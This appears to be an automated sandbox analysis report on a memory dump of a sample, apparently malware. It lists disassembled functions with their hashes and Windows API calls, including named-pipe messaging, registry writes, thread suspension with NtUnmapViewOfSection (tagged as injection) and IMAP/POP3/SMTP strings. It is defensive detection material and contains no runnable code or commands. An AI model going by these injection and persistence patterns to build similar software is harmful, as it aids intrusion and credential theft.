  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
